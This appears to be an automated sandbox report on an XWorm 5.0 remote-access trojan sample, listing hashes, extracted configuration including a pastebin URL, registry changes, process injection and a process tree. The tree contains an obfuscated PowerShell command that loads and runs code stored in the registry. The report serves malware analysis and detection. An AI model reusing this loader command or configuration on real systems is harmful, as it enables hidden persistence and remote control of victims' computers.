Analysis
-
max time kernel
150s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
31/10/2024, 09:01
Static task
static1
Behavioral task
behavioral1
Sample
GBFJ2_DeadPayload.exe
Resource
win7-20240708-en
General
-
Target
GBFJ2_DeadPayload.exe
-
Size
500KB
-
MD5
36656751a6f5235ee7733f649f2333f1
-
SHA1
ce686bf0173d8fbc77bda352ec44021d1bc48630
-
SHA256
fe2ab997f171c9095fd8bfa2f0355d12d336e4b98e3305836ae565d1a4667fb0
-
SHA512
fb84cc76183a1a89017c1f33a95c0f8e040a422549f85b29a171373a909e3e8b9cbecfa428eeab42a6c816f77e522f168f2428622b2a35bc2e1324cd9e535b88
-
SSDEEP
12288:U3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sdzO:OkGTy
Malware Config
Extracted
xworm
5.0
QgVg78qW15uIsQ4H
-
Install_directory
%Public%
-
install_file
ohh.exe
-
pastebin_url
https://pastebin.com/raw/J09JweeH
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000016c03-6.dat family_xworm behavioral1/memory/2916-8-0x0000000000DF0000-0x0000000000DFE000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2800 created 432 2800 powershell.EXE 5 -
Xworm family
-
Executes dropped EXE 2 IoCs
pid Process 2916 DeadMan.exe 2928 DeadRoot.exe -
pid Process 2800 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2800 set thread context of 2792 2800 powershell.EXE 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadRoot.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b035d582732bdb01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2800 powershell.EXE 2800 powershell.EXE 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe 2792 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2916 DeadMan.exe Token: SeDebugPrivilege 2800 powershell.EXE Token: SeDebugPrivilege 2800 powershell.EXE Token: SeDebugPrivilege 2792 dllhost.exe Token: SeAuditPrivilege 836 svchost.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 2360 wrote to memory of 2916 2360 GBFJ2_DeadPayload.exe 32 PID 2360 wrote to memory of 2916 2360 GBFJ2_DeadPayload.exe 32 PID 2360 wrote to memory of 2916 2360 GBFJ2_DeadPayload.exe 32 PID 2360 wrote to memory of 2928 2360 GBFJ2_DeadPayload.exe 33 PID 2360 wrote to memory of 2928 2360 GBFJ2_DeadPayload.exe 33 PID 2360 wrote to memory of 2928 2360 GBFJ2_DeadPayload.exe 33 PID 2360 wrote to memory of 2928 2360 GBFJ2_DeadPayload.exe 33 PID 2680 wrote to memory of 2800 2680 taskeng.exe 35 PID 2680 wrote to memory of 2800 2680 taskeng.exe 35 PID 2680 wrote to memory of 2800 2680 taskeng.exe 35 PID 2800 wrote to memory of 2792 2800 powershell.EXE 37 PID 2800 wrote to memory of 2792 2800 powershell.EXE 37 PID 2800 wrote to memory of 2792 2800 powershell.EXE 37 PID 2800 wrote to memory of 2792 2800 powershell.EXE 37 PID 2800 wrote to memory of 2792 2800 powershell.EXE 37 PID 2800 wrote to memory of 2792 2800 powershell.EXE 37 PID 2800 wrote to memory of 2792 2800 powershell.EXE 37 PID 2800 wrote to memory of 2792 2800 powershell.EXE 37 PID 2800 wrote to memory of 2792 2800 powershell.EXE 37 PID 2792 wrote to memory of 432 2792 dllhost.exe 5 PID 2792 wrote to memory of 476 2792 dllhost.exe 6 PID 2792 wrote to memory of 492 2792 dllhost.exe 7 PID 2792 wrote to memory of 500 2792 dllhost.exe 8 PID 2792 wrote to memory of 596 2792 dllhost.exe 9 PID 2792 wrote to memory of 672 2792 dllhost.exe 10 PID 2792 wrote to memory of 760 2792 dllhost.exe 11 PID 2792 wrote to memory of 808 2792 dllhost.exe 12 PID 2792 wrote to memory of 836 2792 dllhost.exe 13 PID 2792 wrote to memory of 972 2792 dllhost.exe 15 PID 2792 wrote to memory of 268 2792 dllhost.exe 16 PID 2792 wrote to memory of 108 2792 dllhost.exe 17 PID 2792 wrote to memory of 688 2792 dllhost.exe 18 PID 2792 wrote to memory of 1108 2792 dllhost.exe 19 PID 2792 wrote to memory of 1172 2792 dllhost.exe 20 PID 2792 wrote to memory of 1228 2792 dllhost.exe 21 PID 2792 wrote to memory of 1080 2792 dllhost.exe 23 PID 2792 wrote to memory of 624 2792 dllhost.exe 24 PID 2792 wrote to memory of 1616 2792 dllhost.exe 25 PID 2792 wrote to memory of 1844 2792 dllhost.exe 26 PID 2792 wrote to memory of 2744 2792 dllhost.exe 27 PID 2792 wrote to memory of 2680 2792 dllhost.exe 34
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{887a5d70-df16-47be-8a22-0993d9eb9c1f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1080
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1616
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:672
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:760
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:808
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1172
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:836 -
C:\Windows\system32\taskeng.exetaskeng.exe {F6F04963-8848-4DF3-ABE3-441A8967E354} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](68)+'e'+[Char](97)+''+[Char](100)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:972
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:268
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:108
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:688
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1108
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:624
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1844
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2744
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\GBFJ2_DeadPayload.exe"C:\Users\Admin\AppData\Local\Temp\GBFJ2_DeadPayload.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Public\DeadMan.exe"C:\Users\Public\DeadMan.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Users\Public\DeadRoot.exe"C:\Users\Public\DeadRoot.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2928
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD586596f8f255ec89d279b0824435e99ad
SHA1828d881cd4e693004ef8285aec99ef741b7f12ea
SHA256be04723ba31eb34aafe705d2ae69a8b76cd717f3d378c49eee960a86112b7a58
SHA512ed8429cf751326a5b646e35c59c61b2b3a0fdd7179f6a9a33e0bc70526dd96a72e02c2456d480cb26a8c0cd5f641842a73073bd2dc246d038d3642cec14f4672
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4